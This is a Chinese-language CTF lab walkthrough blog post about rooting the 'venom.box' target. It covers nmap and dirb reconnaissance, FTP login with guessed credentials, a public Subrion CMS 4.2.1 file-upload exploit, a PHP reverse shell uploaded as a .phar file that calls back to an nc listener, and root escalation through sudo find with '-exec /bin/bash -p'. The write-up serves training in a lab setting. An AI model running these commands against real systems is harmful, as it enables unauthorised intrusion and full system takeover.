文件上传漏洞,find提权

1.目标

得到root权限,最终拿到flag。

2.信息收集

目标机和操作机ip互通

ifconfig查看本机ip地址

扫描靶机ip地址nmap 扫描出的端口和服务命令:nmap 参数 ip

发现开放端口21,22,80,443,7070,8084,

用浏览器打开80端口:IP:80

对网站进行文件扫描:dirb http://IP

打开神器F12查看源码发现MD5加密代码

猜测账户和密码都是hostinger

3.漏洞利用

连接靶机ssh没有开启直接ftp服务登录:ftp IP 发现可行得到上面的账号和密码hostinger进行登录

收集信息第一步就是查看目录

发现一个hint.txt下载到桌面,查看hint.txt文件。

发现有两个是base64加密和一个password,venom.box.

解密base64拼接语句

现将主机添加到venom.box再进行访问

登录知道账户:dora密码:

点击进去

发现cms版本号是一个熟悉的文件上传漏洞searchsploit Subrion 4.2.1

复制当前路径searchsploit -m php/webapps/49876.py

直接查看python3 49876.py -h

直接运行 python3 49876.py -u http://venom.box/panel -l 账户 -p 密码

  1. usr/share/webshells/php目录下有php-reverse-shell.php代码,将其中的IP改为自己的操作机本地IP,保存为php-reverse-shell.phar,然后上传
  2. 修改后上传打开监听端口nc -lvvp 6666
  3. 访问venom.box/uploads/php-reverse-shell.phar路径成功反弹拿到shell打一个交互shellpython -c "import pty;pty.spawn('/bin/bash')"
  4. 开始提权收集信息发现backup.bak进入发现一个txt文件查看发现一个账户和密码继续收集信息发现一个密码切换用户hostinger密码hostinger继续收集信息发现nathan用户切换用户hostinger发现有一个.bash_history
  5. 发现了查新suid程序的命令:find / -perm -u=s -type f 2>/dev/null运行后无果。切换用户nathan发现.bash_history运行命令sudo -l提权发现可以接着输入find /bin/bash -exec whoami \;发现有回显接着输入find . -exec /bin/bash -p \; -quit提权成功
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值